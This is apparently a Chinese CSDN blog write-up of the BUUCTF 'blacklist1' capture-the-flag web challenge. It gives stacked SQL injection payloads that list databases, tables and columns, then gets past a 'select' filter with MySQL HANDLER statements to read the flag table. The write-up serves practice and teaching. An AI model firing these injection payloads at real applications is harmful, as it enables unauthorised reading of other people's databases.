BUUCTF WEB blacklist1

本文探讨了SQL注入攻击中如何通过堆叠注入获取数据库、表和列名,重点在于应对select语句被过滤的情况。作者分享了三种思路,但指出在不同靶场中可能存在过滤差异,比如大小写敏感性。文章提到了MySQL的Handler方法作为解决方案,并给出了参考链接和视频教程。
摘要由CSDN通过智能技术生成

之前做过这题,就当是复习了
堆叠注入得到数据库名,表名,列名

-1';show databases;# //得到库名
-1';show tables;# //得到表名
-1';show columns from FlagHere;#//得到列名

下面就是主要点,select被过滤了,这题考的就是这个的过滤思路,三种思路,可以看我之前的文章
https://blog.csdn.net/qq_41696858/article/details/119513224
但是buuctf的靶场和攻防世界的还不一样,攻防世界靶场可以大小写绕过某些过滤,而buuctf不可以,所以方法1,2失效
剩下的只有mysql带的handler

-1';handler `FlagHere` open;handler `FlagHere` read first;#

参考视频链接:https://www.bilibili.com/video/BV1534y1U731/

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值